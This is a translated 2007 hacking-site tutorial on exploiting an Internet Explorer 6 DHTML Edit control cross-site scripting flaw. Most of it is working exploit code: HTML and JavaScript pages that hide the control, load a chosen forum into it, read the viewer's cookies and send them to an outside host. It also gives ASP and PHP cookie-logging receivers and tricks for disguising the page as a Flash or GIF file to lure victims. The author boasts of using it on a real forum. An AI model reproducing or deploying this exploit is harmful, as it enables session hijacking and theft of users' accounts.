In-depth exploitation of the MSIE DHTML Edit cross-site scripting vulnerability (vulnerability warning, Black Bar Safety Net)

2007-09-08T00:00:00
ID MYHACK58:62200716842
Type myhack58
Reporter Anonymous (佚名)
Modified 2007-09-08T00:00:00

Description

MSIE DHTML Edit cross-site scripting vulnerability. Microsoft has finally disclosed the MSIE DHTML Edit control cross-site scripting vulnerability, but no good exploit has circulated, and a crowd of newbies has been complaining endlessly. Don't worry: isn't this a feast for everyone?!

[Affected system]
- Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000

[Vulnerability description] The DHTML Edit control in Microsoft Internet Explorer filters part of its data incorrectly, and a remote attacker can exploit this to carry out cross-site scripting attacks and obtain sensitive information. The security problem is that the hosting (parent) page can reach into the control, including the Script object of the window it contains, and an attacker can inject JavaScript straight into the control through execScript. Because the control's window can be named and pointed at another site, script injected afterwards runs in that site's context and can read its document.cookie. When the target user opens a malicious link, the script executes and the sensitive information leaks out. It appears to affect only IE 6.0 and not Windows XP SP2, but users who have not applied SP2 to XP are not a minority, so the vulnerability still has considerable practical value.

Since the Windows XP SP1 I am using has exactly this vulnerability, we first build the following HTML page locally to test it:

<html>
<head>
<title>test</title>
</head>
<body>
<object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="800" height="600" align="middle">
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
// Runs inside the DHTML Edit control's window: name that window and load
// the target forum into it, so later execScript calls run in the forum's context.
function shellscript() {
  window.name="poorchild";
  open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
function main() {
  x.DOM.Script.execScript(shellscript.toString());
  x.DOM.Script.setTimeout("shellscript()");
  // The alert stalls the viewer while the forum page finishes loading in the control.
  alert('and so on++++++++++++++++++++++++++');
  // By now the control holds the forum page, so this reads the forum's cookies.
  x.DOM.Script.execScript('alert(document.cookie)');
}
// Wait for the control itself to load before main() runs.
setTimeout('main()',1000);
</SCRIPT>
</body>
</html>

Open it with IE; if your system has this vulnerability, you will see it now: my cookie for the Black Anti forum pops up. But this page is not convenient to use and its success rate is not high: if you click OK before the DHTML control has finished loading, no cookie pops up at all. A viewer who clicks the popup before the page has finished loading guarantees that the attack fails, so this is still not good enough. Let's supplement and modify the page so that it becomes a page that steals cookie information with a high success rate. Now let's get to work.

To allow more loading time, first make the parameter in setTimeout('main()',1000) larger; set it to 10000, i.e. 10 seconds, which is long enough. Although the page is still being held in that wait, the status bar already shows "Done", so we override the status bar text by adding the following function:

function clock() {
  var title="being loaded, please wait++++++++++++++";
  status=title;
}

To entice viewers to open this page as much as possible, we rename it to a .swf file, i.e. disguise the page as a Flash file, and add the following to the page:

<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
<param name="movie" value="http://www.istacey.net/project/exorcist/icon/promo3.swf">
<param name="quality" value="High">
<embed src="http://www.istacey.net/project/exorcist/icon/promo3.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High">
</object>

At the same time we hide the DHTML control by setting its width and height attributes to 0. To send the cookie out, we add the following script:

x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");

For testing convenience this sends the viewer's cookie information to an online comment form. The final test page is:

<html>
<head>
<title>test</title>
</head>
<body>
<object id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="0" height="0" align="middle">
<PARAM NAME="ActivateApplets" VALUE="1">
<PARAM NAME="ActivateActiveXControls" VALUE="1">
</object>
<SCRIPT>
// Keep the status bar claiming that the page is still loading.
function clock() {
  var title="being loaded, please wait++++++++++++++";
  status=title;
}
// Runs inside the control's window: name it and load the target forum into it.
function shellscript() {
  window.name="poorchild";
  open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
function main() {
  x.DOM.Script.execScript(shellscript.toString());
  x.DOM.Script.setTimeout("shellscript()");
  // A chain of alerts keeps the viewer busy while the forum page loads in the hidden control.
  alert("the name of the game: the mystery of the altar\n");
  alert("test by those with superhuman powers of observation are!\n");
  alert("the world's only 10 individual can all find out!\n");
  alert("believe you that this 10 individual is a member of\n");
  alert("good luck++++++++++++++++++++\n");
  alert("be sure to find different after click on OK it!!!!\n");
  //x.DOM.Script.execScript('alert(document.cookie)');
  // Read the forum's cookies from inside the control and send them to the comment form.
  x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");
}
// Delay raised from 1000 to 10000 ms as described above. The original does not
// show how clock() is invoked; a periodic call is assumed here.
setTimeout('main()',10000);
setInterval('clock()',1000);
</SCRIPT>
<object classid="clsid:D27CDB6E-AE6D-11CF-96B8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="800" height="600">
<param name="movie" value="http://www.istacey.net/project/exorcist/icon/promo3.swf">
<param name="quality" value="High">
<embed src="http://www.istacey.net/project/exorcist/icon/promo3.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="76" quality="High">
</object>
</body>
</html>

The file http://www.istacey.net/project/exorcist/icon/promo3.swf is an address a friend sent me to get me to click through; he never expected me to use it for my own purposes, haha. For the test I posted an article in the Black Anti forum, one meant to be attractive. Was it? I guess plenty of people fell for it! In fact we can rename the attack file to .swf; and to upload it easily in the forum (which does not allow the .swf format) I renamed it to .gif. Since this exploits an IE vulnerability, the page can be hosted anywhere, but note this function:

function shellscript() {
  window.name="poorchild";
  open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}

It defines which site's cookie we steal from the viewer's machine. I set it to the Black Anti forum; everyone can replace it with the forum they want to attack. The page opened here should also have little content, preferably no pictures, to shorten the loading time. Well, let me first look at the effect myself.

It seems to have succeeded. So that the viewer does not see their own cookie information, you can send it to a custom ASP page of your own instead. The method is to create the following page on a host that supports ASP and the FSO component:

<%
testfile=Server.MapPath("cookie.txt")
cookies=Request("cookie")
set fs=server.CreateObject("scripting.filesystemobject")
' 8 = ForAppending, True = create the file if missing, 0 = ASCII
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&cookies&"")
thisfile.close
set fs = nothing
%>

Name it cookie.asp, and note that the following line

x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdArticleId=&fdTitle=&fdLink=&func=add&s1=%B7%A2%B1%ED%C6%C0%C2%DB&fdComments='+document.cookie)");

must be changed to

x.DOM.Script.execScript("window.open('http://youwebsite.com/cookie.asp?cookie='+document.cookie)");

Or, on a host that supports PHP, create the following page, which appends the whole query string of each hit to info.txt:

<?php
$info = getenv("QUERY_STRING");
if ($info) {
  $fp = fopen("info.txt","a");
  fwrite($fp,$info."\n");
  fclose($fp);
}
?>

So with this vulnerability we can steal the cookie information of any forum, no matter how much security the forum has put in place: as long as the viewer's IE has this vulnerability and the viewer is logged in to the forum, we can successfully get their cookies. It can truly be called a forum killer!